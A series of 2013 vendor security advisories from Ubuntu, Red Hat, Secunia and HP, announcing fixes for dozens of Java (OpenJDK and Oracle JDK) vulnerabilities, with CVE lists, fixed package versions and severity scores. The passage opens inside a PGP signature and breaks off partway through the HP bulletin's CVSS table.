WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-1724-1
February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK.
Software Description:
- openjdk-7: Open Source Java implementation
- openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. An attacker could exploit these
to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,
CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information
disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE.
(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,
CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. This issue only affected Ubuntu 12.10. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. This
issue only affected Ubuntu 12.10. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE.
This issue only affected Ubuntu 12.10. (CVE-2013-0449)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-sun security update
Advisory ID: RHSA-2013:0236-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0236.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0432
CVE-2013-0433 CVE-2013-0434 CVE-2013-0435
CVE-2013-0438 CVE-2013-0440 CVE-2013-0441
CVE-2013-0442 CVE-2013-0443 CVE-2013-0445
CVE-2013-0446 CVE-2013-0450 CVE-2013-1473
CVE-2013-1475 CVE-2013-1476 CVE-2013-1478
CVE-2013-1480 CVE-2013-1481
=====================================================================
1. Summary:
Updated java-1.6.0-sun packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1480, CVE-2013-1481)
All users of java-1.6.0-sun are advised to upgrade to these updated
packages, which provide Oracle Java 6 Update 39. All running instances of
Oracle Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1481.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE7WXlSAg2UNWIIRAuWTAJ4g2iIk0XnUEpbIXz6nDgDjaHxz7ACbBcjy
gqkoqFew2BZDYA/n817qYO8=
=m5pJ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
